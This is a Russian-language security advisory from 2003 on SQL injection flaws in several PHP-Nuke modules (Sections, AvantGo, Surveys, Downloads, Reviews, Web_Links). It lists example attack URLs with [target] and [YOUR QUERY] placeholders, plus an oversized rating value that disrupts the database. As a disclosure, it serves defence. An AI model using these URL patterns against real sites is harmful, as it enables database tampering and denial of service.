SQL инъекция в нескольких модулях в PHP-Nuke
| Дата публикации: | 21.05.2003 |
| Всего просмотров: | 2267 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Несколько уязвимостей обнаружено в PHP-Nuke. Удаленный пользователь может выполнить произвольные SQL команды на связанной базе данных. Удаленный пользователь может также нарушить работу базы данных.
Сообщается, что удаленный пользователь может сконструировать специально обработанный URL, чтобы выполнить произвольные SQL команды на связанной базе данных. Уязвимы следующие переменные: 'secid' в модуле Sections 'sid' в модуле AvantGo 'pollID' в модуле Surveys 'cid' в модуле Downloads 'id' в модуле Reviews 'cid' в модуле Web_LinksПример: http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY] http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY] http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY] http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY] http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY] http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0 http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=` [YOUR QUERY] http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD http://[target]/modules.php?name=Reviews&rop=showcontent&id=` [YOUR QUERY] http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY] http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]& http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=? &ratinghost_name=?&rating=99999999999999999999999 9999999999Также сообщается, что удаленный пользователь может нарушить работу целевого сервера базы данных. Пример: http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=? &ratinghost_name=?&rating=9999999999999999999 9999999999999999999999999999999999999999999999999999Уязвимость обнаружена в PHP-Nuke 5.5, 6.0, 6.5 |
| Ссылки: | PHP-Nuke Denial of Service attack and more SQL Injections |